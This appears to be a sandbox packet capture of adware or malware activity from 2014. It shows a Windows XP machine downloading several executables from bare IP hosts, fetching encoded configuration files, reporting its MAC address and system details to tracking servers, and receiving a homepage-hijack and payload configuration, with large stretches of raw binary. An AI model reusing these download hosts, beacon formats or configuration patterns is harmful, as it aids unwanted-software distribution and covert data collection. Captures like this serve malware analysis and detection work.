.......}...q...c..._...`...`..._...^...^...^...^...^...^...^...^...^..
.^...^...^...^...^...^...^...^...^...^...^...}...}...}...}...}...}...}
...}...}...}...}...}...}...}...}...}...}...~.......{...e...V...V...Y..
.X..}S..}R...Y..._...`...^...^...^...^...^...^...^...^...^...^...^...^
...^...^...^...^...^...^...}...}...}...}...}...}...}...}...}...}...}..
.}...}...}...}...}.......}...j...[...............................o..~U
...W..._..._...^...^...^...^...^...^...^...^...^...^...^...^...^...^..
.^...^...}...}...}...}...}...}...}...}...}...}...}...}...}...|...~...~
...t..._...`...........................................x..}T...\...`..
.^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...}...}...}
...}...}...}...}...}...}...}...}...}...}.......{...i...\..~V..........
.............................................\...Y...`...^...^...^...^
...^...^...^...^...^...^...^...^...^...^...}...}...}...}...}...}...}..
.}...}...}...|...~.......v...b...]..~V...{............................
...............................c...Y...`...^...^...^...^...^...^...^..
.^...^...^...^...^...^...}...}...}...}...}...}...}...}...}...}.......}
...n...^...\...a..zR..................................................
................._...[..._...^...^...^...^...^...^...^...^...^...^...^
...^...}...}...}...}...}...}...}...}...~...~...t...d...\...^...^...a..
zQ................................................................
<<< skipped >>>


GET /DM15/DMSet.Xml HTTP/1.1
Content-Type: text/html
Host: update.yinyue.fm
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)


HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 11 Sep 2014 02:53:27 GMT
Accept-Ranges: bytes
ETag: "331fd48f6bcdcf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:18:09 GMT
Content-Length: 5604
[Set]..DOSJ=0..MeCQ=No..DMVer=0..ZDXFALL=0..JCCS=1867BD..MeClose=No..K
aKaMen=Yes..YSYC=7D849E..BCCC=A1C5DD..YXYX=91C00C55..CLYY=42A7F3..PNPN
=D5054099..IXT1=E81DA6..IXT2=B328BD..IXT3=A828A731..IXT4=E912AB..IXT5=
A1C51F..SetHpt2=E51564B3..DMIDS=C7234EE00961F7117ED03FA90C7BEA4DB92A..
HEHEHE=4D9F3E9823778C912DB736BD1857AF03469E328DD82DB90D16..ZDSD=76829F
E53C92EE08177ADC277D879D304AABF108AEF40F156FC1DB267C86..DMMac=C30650EE
75859EE776CF145191D0D464E77CDF7FCED617AEF7738BC61052E00AAACD..TJRED=DC
6FC914AEC2DB21BC074188D616A02CB5000451EC7DCCD01EA73F449F3B85C5DC21A836
B4076CC82C..TJRED2=01439D388296EF3580DA155CFA4A94D36DCBD361FC4D9CE06EF
74F54EF4B952A71B53D9A298BE07D90..TJRED3=65E776C01B7F849925BF0E4593D26D
F846909426B136B5C9075CE33980DB7ACE2A72F94785D73D99FC..[DM1]..ASSJ=0..X
Has=No..ASAll=0..DM1IDS=768092E33C92FE6BCD3B54FA1573C5214CE20363..1=..
2=..3=..4=..5=..[DM2]..ST=180..DS=20..All=1..XHKG=Yes..DM2JG=0..DM2ZS=
No..SJDM2=No..DM2IDS=90EE0D6E8A2D45AD0069862947A13453B205618D..1=No|R1
|18|18|250|340|5|No|Yes|0|No|20|1|No|94C812|BC0FA9348EE2384DEE4CE93281
C00554E363BB085FB3C0DB267C81C30C11539FE77AC418AE|No|0|0..2=..3=..4=..5
=..[DM3]..ST=300..DS=60..All=1..XHKG=Yes..DM3JG=0..DM3ZS=No..SJDM3=No.
.DM3IDS=64B2C0DD3A9CF41DB3DC0AACDA359BCA3A9CC825..1=No|R1|18|29|250|34
0|5|No|Yes|0|No|No|0F77CC|37B5005EE4354E57E476C7DF73F64FE272FD064699F9
1B66BCC6DF62EE3484C76AF54E569423BA0D66F575C969F470|1BMP|0|0..2=..3=..4
=..5=..[DM4]..DS=0..TM=255..DJS=0..TP3=Yes..TPTP=No..XSKK=No..DMTG=B52
EB7..DM4IDS=769DF45BB7D37A97F047A1CF6681EC43A3C3..TS=6916EA9EADAE5
<<< skipped >>>


GET /stat.htm?id=4327411&r=&lg=en-us&ntime=none&cnzz_eid=921366142-1410999416-&showp=1276x846&t=&h=1&rnd=2115344014 HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwc
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: hzs2.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Thu, 18 Sep 2014 00:16:56 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..



GET /dls/axuls.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 219.239.223.191
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 148992
Content-Type: application/octet-stream
Last-Modified: Tue, 16 Sep 2014 12:45:00 GMT
Accept-Ranges: bytes
ETag: "187b9d7acd1cf1:1cc1"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:14:35 GMT
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
..............................@.......................................
.......@[email protected]................... ..
T.....................................................................
..............CODE....,........................... ..`DATA............
....................@...BSS.....1................................idata
[email protected]................................
[email protected].... ............
[email protected][email protected][email protected]................
[email protected]..............................................
......................................................................
[email protected]...........@.
.False.True.@.,[email protected][email protected][email protected].@...@.
[email protected]@[email protected]@[email protected]@[email protected]@.l5
@[email protected][email protected][email protected]............
........F.System......D$....M...D$....M...D$....M.....@...@...@.......
.............F .@...........@.,.@...........................@.....\.@.
.7@..^@..^@[email protected]@..^@[email protected]@[email protected].
...........([email protected].%..A....%..A....%..A....%..A....%..A....%..
<<< skipped >>>

GET /dls/axult.exe HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 219.239.223.191
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 144896
Content-Type: application/octet-stream
Last-Modified: Tue, 16 Sep 2014 12:44:57 GMT
Accept-Ranges: bytes
ETag: "586c875acd1cf1:1cc1"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:14:39 GMT
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
..............................@.......................................
[email protected]......................
......................................................................
..............CODE....,........................... ..`DATA............
....................@...BSS.....9................................idata
[email protected]................................
[email protected]....................
[email protected][email protected]................
[email protected]..............................................
......................................................................
[email protected]...........@.
.False.True.@.,[email protected][email protected][email protected].@...@.
[email protected]@[email protected]@[email protected]@[email protected]@.l5
@[email protected][email protected][email protected]............
........F.System......D$....M...D$....M...D$....M.....@...@...@.......
.............F .@...........@.,.@...........................@.....\.@.
.7@..^@..^@[email protected]@..^@[email protected]@[email protected].
...........([email protected].%..A....%..A....%..A....%..A....%..A....%..
<<< skipped >>>

GET /hzsoft/IFoxInstall-y-c203945859-run-s-x.exe HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 219.239.223.191
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Length: 500680
Content-Type: application/octet-stream
Last-Modified: Fri, 09 May 2014 11:05:43 GMT
Accept-Ranges: bytes
ETag: "f68dc59e766bcf1:1cc1"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 18 Sep 2014 00:14:40 GMT
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
....D./.......,.......:.o.....=......j.......j..........6.....3.......
-.......(.....Rich............PE..L...jB.P............................
.\............@.......................................@...............
..................Tp..@.......<j...................`...J..0........
...........................@..........................................
..text............................... ..`.rdata.......................
.......@[email protected]\.......:[email protected]...<j......
.l..................@[email protected]...`[email protected]......
......................................................................
......................................................................
......................................................................
......................................................................
..................................................j`...D..a]........$.
E....j.Q....e.h..D.......}.W.s~..3..]...........D...1...E......E..4.D.
.]..]..]..]..]..]......h.:...5..E....i......K...h....h....j.j.Y.E.....
......j..M.Q...P.SW........M.Q...P.....E....}.....4.D.......h.:...5..E
..................M.j0jnj<..(.E..F........j..M.Q...P..].VS.b......M
.Q...P.....E....}.....L.D...6...3..d.D.V.........E......E...E......E..
.M..E...M..E...M..M..M..M........................\...........j..U.R.P.
......S.....V.}.......E...........%......E...........E..p.D......h
<<< skipped >>>


GET /0815/help1.html HTTP/1.0
Host: update.yoyolm.net
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:17:55 GMT
Content-Length: 538
Content-Type: text/html
Last-Modified: Tue, 09 Sep 2014 07:24:49 GMT
Connection: Close
ETag: "e47ee24ffcbcf1:676"
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Fw-Via: DISK HIT from cnc-sd-153-132.fcd, DISK HIT from ctl-gd-148-147.fcd
TRW2VjdF0KODY9MQo4Nz0xCjg4PTEKODk9MQo5MD0xCjkxPTEKOTI9MQo5Mz0xCjk0PTEK
OTU9MQo5Nj0xCjk3PTEKOTg9MQo5OT0xCjEwMD0xCjEwMT0xCjE1MD0xCjE1MT0xCjE1Mj
0xCjE1Mz0xCjE1ND0xCltnXQowPTEKW3BhXQowPTEKW2kxXQowPTEKW2kyXQowPee juiY
keWboui0rQpbaTNdCjA9aHR0cDovL3d3dy5tZWltb3R1YW4uY29tL2ljby5pY28KW2k0XQ
owPW1tdC5pY28KW2k1XQowPWh0dHA6Ly93d3cubWVpbW90dWFuLmNvbS8/cmwKW3NuYW1m
MV0KMD00CltzbmFtZjJdCjA9NApbc25hbV0KMD0zCltzanMzXQowPTEwCltyZWNdCjA9aH
R0cDovL2RsLjM2MHNhZmUuY29tL3AvU2V0dXBfb2VtcWQ1MS5leGUKW2Rpcl0KMD1TZXR1
cF9vZW1xZDUxLmV4ZQpbZHNjXQowPS9TCltlZF0KRTA9MQ==..



GET /client/jstm/1.1.0.0a-zm-157391-v5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tonnn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Thu, 18 Sep 2014 00:18:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 930
Connection: keep-alive
Set-Cookie: session=eyJfaWQiOnsiIGIiOiJZekV3TVRrd09EaGhZbVpsTlROaU16RmtOREF3Tm1FMk5tWmpNR1V3WWpBPSJ9fQ.Bvu2PA.34duzsjZLJBfgqJDEuIQuoUIl9U; Domain=.tonnn.com; HttpOnly; Path=/
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.
<html>.<head>..<meta charset="utf-8">..<title>
.........</title>..<script type="text/javascript" src="http:/
/static.tonnn.com/base/jquery/jquery-1.10.2.min.js"></script>
.    <script type="text/javascript" src="hXXp://static.tonnn.com/ba
se/jquery-cookie/jquery.cookie.1.3.1.js"></script>.</head&
gt;..<body style="border:none; padding:0; margin:0;" scroll="no">
;.    <iframe width="797" height="469" frameborder="0" src="/client
/jstm/login/is_Desktop" scrolling="no"></iframe>.    ..<sc
ript type="text/javascript">...//if(!$.cookie('popFlag')) $.cookie(
'popFlag', 0, {expires:3});...//var popFlag = $.cookie('popFlag');....
..//if(popFlag<2){....//setTimeout(function(){window.open('hXXp://t
2.web.tonnn.com/tg/qs/chuanqi3/client/popup/')},parseInt(Math.random()
*600 1) * 1000);....//$.cookie('popFlag', parseInt(popFlag) 1, {expire
s:1});...//}.    </script>..</body>.</html>HTTP/1.1 
200 OK..Server: nginx/1.2.0..Date: Thu, 18 Sep 2014 00:18:04 GMT..Cont
ent-Type: text/html; charset=utf-8..Content-Length: 930..Connection: k
eep-alive..Set-Cookie: session=eyJfaWQiOnsiIGIiOiJZekV3TVRrd09EaGhZbVp
sTlROaU16RmtOREF3Tm1FMk5tWmpNR1V3WWpBPSJ9fQ.Bvu2PA.34duzsjZLJBfgqJDEuI
QuoUIl9U; Domain=.tonnn.com; HttpOnly; Path=/..P3P: CP="UNI CUR OUR", 
policyref="/w3c/p3p.xml"..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4
.01 Transitional//EN">.<html>.<head>..<meta char
<<< skipped >>>


GET /ext/ext.7z HTTP/1.1
User-Agent: Beacon
Host: s.sogv.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:18:23 GMT
Content-Length: 54492
Content-Type: application/octet-stream
Content-Location: hXXp://s.sogv.com/ext/ext.7z
Last-Modified: Sun, 20 Jul 2014 14:08:34 GMT
Accept-Ranges: bytes
ETag: "861c1f1824a4cf1:195f"
Server: NGINX/0.6.39
X-Powered-By: WAF/2.0
7z..'...............$.........4\.~..\].=.=A......$...~.%.....s...f.^Rj
c1..~-.......`.~..`..YVJZ1..E.........#.]33[.R.CW? R:.fh;Da.M..._<.
........2.9.u.fzP....x.....q%...}./..(..1....Q.qm......9.L.q..h..z....
.,...Y..6.....$bR.....k........6...A)....`.^.M........d.mv.u.V.nW..i.n
....=.a.G...T,~T....7.........8.M'.j@...\*...t.)].i..Q.m.S...d...t]M.F
[email protected].../LR.;...0......s..w1.v.5.$...E..`A&
lt;zL....J.J.A....G~......T.i"j.....XZ..k.....a....&B.HI......}k.*w...
.V..iti.....K...W....D(0.h.'..>h.5........k04.v/h...s_V}.?P ......9
j!*.O.}.Kc.;`.....D..y}..=.....=R..G..........F............&.TZ.....w.
...h....h..{.G....P:.l$...r..G.6...'..F.z...x..Lo9a.#....[...K.F......
....V...............}.wi..........5Y....b..Q.....^.c.e..x..V&Rh.ZW.<
;..f.h5....ECpS..N.o....5A".......%.sM...n..vy"a..I.._.\x.V)S.ZB.x.A,\
..i.$ ....U....w.D...pF..F.WV....h..#-.....P5.v'M\.....{}..#...2...'..
^...7..s^..L..%..0.....<jJ....T_.o.F.....veX.D..v..U......w...E]5y%
.d.6...ex=..1"..I..n...b...w3Q........cr..6.zyd................./| ...
.]bg... ..b.=..vm......i~D6....m;A.........(W..4k).^.......UpV.h.....Y
[email protected]..{.!U.{#.y|..=.>eu..751.Sl.D...M.9#....cJK..
....j.......J/...b|.YW...Y.T.r......Z..v*s.....d......z|...`.......L4.
8....:S.........f....hp......\7.w..?....g?......z.y<.{6.!eUV..?....
..[$..<./........./.t..f..7.[......i\.*8|_..2.....I...'x>..;M1.|
.K..-B...g#.3.IY.J...E--5Zk.l.-K..o...C.9^;..v$G.%%.*d.........!../E&g
t;..]....'/.......Fi.....C(<..h:.M...4bN...Zx....F..Z.......?L.
<<< skipped >>>


GET /dc/run/start/2.0.1.1001/c654925393ae14277410758bb43bb4ec/2561/28/1970-1-1/? HTTP/1.1
Host: appledesktop.sinaapp.com
Connection: Keep-Alive


HTTP/1.1 204 NO CONTENT
Server: nginx/1.4.4
Date: Thu, 18 Sep 2014 00:17:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
via: yq34.pyruntime
Set-Cookie: saeut=CkMPIlQaJJdGuG9OBLGAAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/
HTTP/1.1 204 NO CONTENT..Server: nginx/1.4.4..Date: Thu, 18 Sep 2014 0
0:17:27 GMT..Content-Type: text/html; charset=utf-8..Content-Length: 0
..Connection: keep-alive..via: yq34.pyruntime..Set-Cookie: saeut=CkMPI
lQaJJdGuG9OBLGAAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/..



POST /config/iplocater HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0
Host: API.TUPIAN8.CN
Content-Type: application/x-www-form-urlencoded


HTTP/1.1 302 FOUND
Server: nginx/1.2.0
Date: Thu, 18 Sep 2014 00:18:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 219
Connection: close
Location: hXXp://API.TUPIAN8.CN/login
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">.<titl
e>Redirecting...</title>.<h1>Redirecting...</h1>.
<p>You should be redirected automatically to target URL: <a h
ref="/login">/login</a>.  If not click the link...



GET /02aab2d719917873b95f7e285991ad620000000000082370/9291/25605/sjss_jing_zhimeng_217.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: 183.61.184.37


HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Thu, 18 Sep 2014 00:17:06 GMT
Content-Type: application/octet-stream
Content-Length: 533360
Last-Modified: Tue, 01 Jul 2014 08:56:31 GMT
Connection: keep-alive
ETag: "53b277bf-82370"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......-vCAi.-.i.-.
i.-..a....-.`o..j.-.`o..p.-.i.,...-..a..V.-..a....-..a..h.-..a..h.-.Ri
chi.-.................PE..L....'.S.....................l..............
......@................................. .....@.......................
...................p..8...............p....P..8.......................
................@...............$............................text.....
.......................... ..`.rdata..|P.......R..................@..@
[email protected]................
......@[email protected]...'...P...([email protected]....................
......................................................................
......................................................................
......................................................................
......................................................................
..............................................l.A..I...t.Q.....Y......
......U..VW.}.....u..v...t'3._f..^]....F...t.P.f......W.h.......F._^].
................U..V.u...t%.U...t..E...u..p.A..I.QPRV....A.^]...3.^]..
..........U..V...E....E..t.V..........^]..................U...E.V..P..
l.A..F......$.....^]..................x.A..*........U..V....x.A.......
E..t.V.B........^]...............x..r.........U...E.VP.........x.A...^
][email protected](.M.Q.M..E....../...h..A
..U.R.E.x.A..M.....]..............U......y..r...Q.M.......M.......
<<< skipped >>>


POST /report/use HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0
Content-Length: 86
Host: API.TUPIAN8.CN
Content-Type: application/x-www-form-urlencoded

data=pid=juese.exe.sn=juese.exe.mac=000c298a8b37.sign=a258e4f5333f00a2669be0ac6218706d
HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Thu, 18 Sep 2014 00:18:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2
Connection: close
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
ok..



GET /img/pic.gif HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/count/softcount/?pwc
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: icon.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.3.0
Date: Thu, 18 Sep 2014 00:16:57 GMT
Content-Type: image/gif
Content-Length: 719
Last-Modified: Fri, 16 Jan 2009 08:10:47 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Expires: Fri, 19 Sep 2014 00:16:57 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
GIF89a2.........f..3...33.............................................
.......................................!..NETSCAPE2.0.....!..Powered b
y AFEI.!.......,....2...... !.di.hjBl..p,....x......`P.(...GR.D6...CH.
...,..@8.... -..EQc.8...........`...."....................~"..H.......
.H......"...$....#.........."..........."Z.......*...%!.!.......,....2
...... !.di.hjBl..p,....x..|....p r..H.C.\&.H.tJu...#b......7..W.h....
...7..l..v..-....."....................~"..I........I......"...$....#.
........."..........."\.......*...%!.!.......,....2...... !.di.hjBl..p
,....x..|....p r..H.C.\&.H.tJu...#b......7..W.h.......7..l..v..-....."
....................~"..I........I......"...$....#..........".........
.."\.......*...%!.;HTTP/1.1 200 OK..Server: Tengine/1.3.0..Date: Thu, 
18 Sep 2014 00:16:57 GMT..Content-Type: image/gif..Content-Length: 719
..Last-Modified: Fri, 16 Jan 2009 08:10:47 GMT..Connection: keep-alive
..Keep-Alive: timeout=5..Expires: Fri, 19 Sep 2014 00:16:57 GMT..Cache
-Control: max-age=86400..Accept-Ranges: bytes..GIF89a2.........f..3...
33....................................................................
................!..NETSCAPE2.0.....!..Powered by AFEI.!.......,....2..
.... !.di.hjBl..p,....x......`P.(...GR.D6...CH....,..@8.... -..EQc.8..
.........`...."....................~"..H........H......"...$....#.....
....."..........."Z.......*...%!.!.......,....2...... !.di.hjBl..p,...
.x..|....p r..H.C.\&.H.tJu...#b......7..W.h.......7..l..v..-....."....
................~"..I........I......"...$....#..........".........
<<< skipped >>>


GET /painter/clb/popup7o.js HTTP/1.1
Accept: */*
Referer: hXXp://adsvc2.9365.info/ad/softad/popup.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dup.baidustatic.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Thu, 18 Sep 2014 00:17:00 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Mar 2014 07:44:44 GMT
Transfer-Encoding: chunked
Connection: close
Server: Apache
Expires: Thu, 18 Sep 2014 00:22:00 GMT
Cache-Control: max-age=300
Content-Encoding: gzip
dcc.............Ymo.6..._!..]) k......Fl'.qi.4...6.J..t..V........Ii..
..]..K..!9/.g.........J..\.W2[6.....['\&....=.u.[..Hm.&jQ....^..;..q#.
.v.[^Y.p..-.....,...;y}~.......D.......l...|U..)..J.^\.#..h6U...H...?.
....-B.%........OU........W<.n.......Q..o...Ez.fA..E^.$.....R-..U..
.:.W..M..Mu.&"......@..&^....].m).....t]........ ...`#V..gz*.~...!5.V.
.S6....M...eG...j.......|..X.h=X......=..d.....<.. vZC.].W...jY8.l.
...s...n...-..4u!.3=...sw..8m.F..*..$I.:x-,VlV.........0.*.?.z,*.\....
....e..._.....c...T...*.s..e.#......t.....\Y5..J......_.2."..k....<
.7}..$.$L/t.U.........c.q;....Vu\~..l......?...H$G..L....T.)=.a.......
.Z9...z...n.s....J..*......;`G.n- .'l.\.....>g...W.h0.....2-......~
..j][email protected][email protected]"...7P.
V.....#-0.....-.$...... 4.e7'....#..\........e..D.3.......l...z.,V...%
....Y..S.....i....)M.....w%..v,.'......].......!....p.\.......<....
v.`...S.....f..'ap.......1%|v.&.a.,..."k.A2.i..!.H..,.3.t.p}.M.g..5...
 .cX...Ev....s....7.s.".....V<'......T..3&iLbl.......A.@$..t......?
.~.............A6.%.......<W.AC}.ng._.......Z...H0\.I../......9\1.y
..A..K%V..%.....1...D....S.>5H....0df=<....<x..8....Wr......Y
!.yx...89.~>U..;..^.....c....9DJ.0....;.xxw....^.g..2.d..b......Q..
.....Gdw ..U..^?.(.F-..}..SF8.>.R....'..F.J.....c&.zDd...>..r...
m....WC.~r..0.]......7.s.Q....sc .f.a..-.f...qtS{..........d..V....mY.
.!..d.k.}...E...s.\B.}.."...m.g.^...:5p.0....2.CY.&....C...&.L.4......
q...7..N......."...A.wS..f.9}.Ngf>.d.v.X...j$.M.......%..E.....
<<< skipped >>>


POST /config/juese/adconf HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0
Host: API.TUPIAN8.CN
Content-Type: application/x-www-form-urlencoded


HTTP/1.1 200 OK
Server: nginx/1.2.0
Date: Thu, 18 Sep 2014 00:18:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 606
Connection: close
P3P: CP="UNI CUR OUR", policyref="/w3c/p3p.xml"
{"lbt": "1800", "dbn": "6", "llt": "10800", "oeu2": "hXXp://s.sogv.com
/ext/update.7z", "ldt": "0", "dbs": "1", "dbt": "360", "mdt": "3600", 
"lbn": "5", "idn": "..netert Hao..23", "udu": "hXXp://VVV.hao123.com/?
tn=99283481_hao_pg", "lu": "hXXp://VVV.vool.cn/_right/", "ls": "1", "u
ds": "1", "ubs": "1", "oes": "1", "oeu": "hXXp://s.sogv.com/ext/ext.7z
", "ubn": "6", "udn": "lnetent Haol23", "upu": "hXXp://VVV.hao123.com/
?tn=99283481_hao_pg", "ibn": "4", "idu": "hXXp://hao.360.cn/?src=lm&ls
=n525187378f", "ids": "1", "st": "1410752066", "mu": "hXXp://VVV.vool.
cn/_mini/", "ms": "1", "ibs": "1", "ups": "1"}..



GET /index.php?encode=NTSwDwNDg0KlllcyxwY2EqMDSwDtMEMtMjktIkLEEtIkLEItMzcscG9kKjUsdW9kKjEwMDgsb3MqV2luZG93cyBYUCxwb2lzb24qLHN0YXTgF1cyoyLGxpc3QqQzpcTgFG9jdW1lbnTgFzIGFuZCBTZXTgF0aW5nc1xhZG1cQXBwbGljYXTgFpb24gTgFGF0YVxBcHBsZUTgFlc2t0b3SwDSwD&process=apples_5_1008.exe HTTP/1.1
Host: inapi.9vh.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Sep 2014 00:17:27 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
0..HTTP/1.1 200 OK..Server: nginx..Date: Thu, 18 Sep 2014 00:17:27 GMT
..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..
Connection: keep-alive..Vary: Accept-Encoding..Vary: Accept-Encoding..
X-Powered-By: PHP/5.3.28..0..



GET /apples_5_1008.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: down.9vh.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Sep 2014 00:17:13 GMT
Content-Type: application/octet-stream
Content-Length: 1515882
Last-Modified: Fri, 05 Sep 2014 05:23:56 GMT
Connection: keep-alive
ETag: "540948ec-17216a"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..........v...%...%
...%...%...%...%...%...%j..%.\.%...%.\.%...%.\.%...%Rich...%..........
..............PE..L...%..R.................v... ..."..G8............@.
......................................................................
..............h`......................................................
.....................................................text....u.......v
.................. ..`.rdata..\#.......$...z..............@[email protected]...
\[email protected]................................
...rsrc...h`.......b..................@..@............................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected][email protected].....@
..}..e....@[email protected]... M.........3..M.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...<[email protected].....@
..u....E..9}[email protected].}[email protected]
[email protected][email protected] ....E..E.Pj.h`[email protected].....@._
^3.[.....L$....D...i.. ...T.....tUVW.q.3.;5..D.sD..i.. ...D..S.....t.G
.....t...O..t .....u...3....3...F.. ..;5..D.r.[_^...U..QQ.U.S....D
<<< skipped >>>


GET /index.php?encode=NDk5NjI1KlllcyxwY2EqMDSwDtMEMtMjktIkLEEtIkLEItMzcscG9kKjUsdW9kKjEwMDgsb3MqV2luZG93cyBYUCxwb2lzb24qLHN0YXTgF1cyoxLGxpc3QqQzpcTgFG9jdW1lbnTgFzIGFuZCBTZXTgF0aW5nc1xhZG1cQXBwbGljYXTgFpb24gTgFGF0YVxBcHBsZUTgFlc2t0b3SwDSwD&process=apples_5_1008.exe HTTP/1.1
Host: inapi.9vh.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 18 Sep 2014 00:17:26 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
0..HTTP/1.1 200 OK..Server: nginx..Date: Thu, 18 Sep 2014 00:17:26 GMT
..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..
Connection: keep-alive..Vary: Accept-Encoding..Vary: Accept-Encoding..
X-Powered-By: PHP/5.3.28..0..



